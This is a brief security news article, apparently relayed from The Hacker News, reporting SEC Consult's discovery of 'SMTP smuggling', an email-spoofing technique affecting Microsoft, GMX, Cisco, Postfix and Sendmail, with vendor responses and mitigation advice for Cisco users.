Security researchers have discovered a new technique that allows threat actors to send spoofed emails with fake addresses. They can use this technique to send highly targeted phishing emails while avoiding detection by email security solutions.
Timo Longin, a senior security consultant at SEC Consult, published a report on the technique, which he called SMTP smuggling.
SMTP is short for Simple Mail Transfer Protocol and is described as a TCP/IP protocol required for sending and receiving email messages. Because outgoing and incoming SMTP servers handle end-of-data strings differently, hackers can “escape” the message data and thus “smuggle” arbitrary SMTP commands, including entire email messages.
No problem for Cisco
Apparently the vulnerability can be exploited in Microsoft, GMX and Cisco servers, also affecting SMTP implementations of Postfix and Sendmail.
Microsoft and GMX have already addressed the issue, but some reports claim that Cisco has decided not to. When discussing the issue, the company apparently said that SMTP smuggling is not exactly a vulnerability, but rather “a feature and that they will not change the default configuration.”
As a result, threat actors can still potentially smuggle emails into Cisco Secure Email instances with default configurations. SEC Consult concluded that the best course of action for Cisco users is to change their settings from “Clean” to “Allow,” as this prevents spoofed emails with valid DMARC checks from reaching the inbox.
Phishing remains the top attack vector for most threat actors. It is ubiquitous, cheap and can be automated. Threat actors can pose as major brands, corporate executives, and the like, and use AI writers to craft emails with a sense of urgency. Victims often respond to these emails (by clicking a link or downloading an attachment) without considering the potential risks, resulting in endpoint compromise or data theft.
Through The HackerNews